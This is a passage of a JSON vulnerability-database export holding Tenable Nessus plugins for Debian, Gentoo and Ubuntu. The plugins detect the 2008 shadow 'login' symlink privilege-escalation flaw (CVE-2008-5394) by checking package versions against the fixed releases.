package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Paul Szabo discovered that login, the system login tool, did not\ncorrectly handle symlinks while setting up tty permissions. If a local\nattacker were able to gain control of the system utmp file, they could\ncause login to change the ownership and permissions on arbitrary\nfiles, leading to a root privilege escalation.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=505271\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2009/dsa-1709\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the shadow package.\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 4.0.18.1-7+etch1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(59);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:shadow\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/01/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/01/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"login\", reference:\"4.0.18.1-7+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"passwd\", reference:\"4.0.18.1-7+etch1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:52:28", "description": "The remote host is affected by the vulnerability described in GLSA-200903-24\n(Shadow: Privilege escalation)\n\n Paul Szabo reported a race condition in the 'login' executable when\n setting up tty permissions.\n \nImpact :\n\n A local attacker belonging to the 'utmp' group could use symlink\n attacks to overwrite arbitrary files and possibly gain root privileges.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 24, "published": "2009-03-11T00:00:00", "title": "GLSA-200903-24 : Shadow: Privilege escalation", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5394"], "modified": "2009-03-11T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:shadow"], "id": "GENTOO_GLSA-200903-24.NASL", "href": "https://www.tenable.com/plugins/nessus/35905", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200903-24.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(35905);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2008-5394\");\n script_xref(name:\"GLSA\", value:\"200903-24\");\n\n script_name(english:\"GLSA-200903-24 : Shadow: Privilege escalation\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200903-24\n(Shadow: Privilege escalation)\n\n Paul Szabo reported a race condition in the 'login' executable when\n setting up tty permissions.\n \nImpact :\n\n A local attacker belonging to the 'utmp' group could use symlink\n attacks to overwrite arbitrary files and possibly gain root privileges.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200903-24\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Shadow users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=sys-apps/shadow-4.1.2.2'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(59);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:shadow\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/03/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"sys-apps/shadow\", unaffected:make_list(\"ge 4.1.2.2\"), vulnerable:make_list(\"lt 4.1.2.2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Shadow\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T15:44:21", "description": "Paul Szabo discovered a race condition in login. While setting up tty\npermissions, login did not correctly handle symlinks. If a local\nattacker were able to gain control of the system utmp file, they could\ncause login to change the ownership and permissions on arbitrary\nfiles, leading to a root privilege escalation.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2009-04-23T00:00:00", "title": "Ubuntu 6.06 LTS / 7.10 / 8.04 LTS / 8.10 : shadow vulnerability (USN-695-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5394"], "modified": "2009-04-23T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:7.10", "p-cpe:/a:canonical:ubuntu_linux:login", "p-cpe:/a:canonical:ubuntu_linux:passwd", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts", "cpe:/o:canonical:ubuntu_linux:8.10", "cpe:/o:canonical:ubuntu_linux:6.06:-:lts"], "id": "UBUNTU_USN-695-1.NASL", "href": "https://www.tenable.com/plugins/nessus/37654", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-695-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(37654);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2008-5394\");\n script_xref(name:\"USN\", value:\"695-1\");\n\n script_name(english:\"Ubuntu 6.06 LTS / 7.10 / 8.04 LTS / 8.10 : shadow vulnerability (USN-695-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Paul Szabo discovered a race condition in login. While setting up tty\npermissions, login did not correctly handle symlinks. If a local\nattacker were able to gain control of the system utmp file, they could\ncause login to change the ownership and permissions on arbitrary\nfiles, leading to a root privilege escalation.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/695-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected login and / or passwd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(59);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:login\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:passwd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:7.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2008-2019 Canonical, Inc. / NASL script (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(6\\.06|7\\.10|8\\.04|8\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 6.06 / 7.10 / 8.04 / 8.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"6.06\", pkgname:\"login\", pkgver:\"1:4.0.13-7ubuntu3.4\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"passwd\", pkgver:\"4.0.13-7ubuntu3.4\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"login\", pkgver:\"1:4.0.18.1-9ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"passwd\", pkgver:\"4.0.18.1-9ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"login\", pkgver:\"1:4.0.18.2-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"passwd\", pkgver:\"4.0.18.2-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"login\", pkgver:\"1:4.1.1-1ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"passwd\", pkgver:\"4.1.1-1ubuntu1.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"login / passwd\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}